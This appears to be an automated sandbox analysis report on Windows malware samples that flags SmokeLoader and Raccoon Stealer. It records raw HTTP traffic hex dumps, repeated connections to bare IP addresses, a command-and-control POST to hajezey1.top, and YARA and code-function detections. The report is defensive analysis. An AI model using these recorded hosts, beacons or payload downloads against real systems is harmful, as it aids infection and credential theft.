Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e 17 9d f8 77 88 8b 91 db d8 70 5d 07 4b ac 9e ed fd 31 bf c2 75 41 97 7e 49 8e 1c 1e bb aa 5e 4f 92 40 28 0d 93 ce 29 75 1c b4 51 a8 b9 c8 93 f9 ae 21 12 97 ea a4 45 b4 7d 5c b0 26 32 42 2e 8f a6 50 cb 3d 7a d4 38 fa 6b 50 36 0d d9 80 bd bf 6c 13 d9 e6 ae c1 27 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 56 53 af 17 bf c1 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5f db c4 87 19 13 bf de 91 90 24 08 4f c5 63 28 c3 a1 61 6e de f5 69 19 13 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4f 19 e0 2c 95 a9 1d 1a f4 96 be 25 51 61 9a 44 45 7e 88 2c c8 48 78 83 cc 4a 98 03 fd 6d 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 cf 0e ff 1a 0c 9b 4a d8 19 8e b6 4d 3b 45 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 15 74 33 f5 89 90 f7 ef e7 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 4f 96 d1 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 ba e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 47 d7 ab 90 4e b1 54 55 a5 04 bd 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 54 40 69 f3 2c fe a4 03 5b f3 1f e4 a6 f3 1a 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 cf e2 e5 84 0e 15 b0 79 8a c3 e0 2b b9 ce b9 01 7e 17 28 d2 0a 4c 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 52 86 20 2b c4 3a 96 4d f7 e7 17 3f fc 9f 7c 4d 9a 70 d4 03 43 a6 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 da af b8 30 4a 43 43 6c 76 02 62 18 5a 67 fa 40 8e af 88 c1 20 ab 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e ee 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:51:02 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jaqhuuufk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49817 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 11.2.9A4B.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.2fa0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.20BD.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.1.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.iwbavbe.2bc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.iwbavbe.2c515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: 3C84.exe, 00000017.00000002.1072827490.000000000115B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR

System Summary:

barindex
.NET source code contains very large array initializations
Source: 31F4.exe.6.dr, ??????????????/_?????xptkvqfesn.cs Large array initialization: _?????nacpgkwmie: array initializer size 208904
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2E2C5 20_2_6AC2E2C5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC332A9 20_2_6AC332A9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1FA2B 20_2_6AC1FA2B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9EBB0 20_2_6AB9EBB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC123E3 20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC0EB8A 20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABB8BE8 20_2_6ABB8BE8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9ABD8 20_2_6AB9ABD8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8AB40 20_2_6AB8AB40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7B090 20_2_6AB7B090
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A830 20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66800 20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21002 20_2_6AC21002
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB98840 20_2_6AB98840
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB86E30 20_2_6AB86E30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC267E2 20_2_6AC267E2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB935D0 20_2_6AB935D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB60D20 20_2_6AB60D20
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_011441F0 23_2_011441F0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01149390 23_2_01149390
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01141280 23_2_01141280
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01140520 23_2_01140520
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01143590 23_2_01143590
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_0114DA80 23_2_0114DA80
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01148DA0 23_2_01148DA0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01140DD0 23_2_01140DD0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01149F88 23_2_01149F88
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01149380 23_2_01149380
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01141278 23_2_01141278
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01140510 23_2_01140510
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_0114DA47 23_2_0114DA47
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01148D93 23_2_01148D93
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_01140DC0 23_2_01140DC0
PE file contains strange resources
Source: 2CF4.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2CF4.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
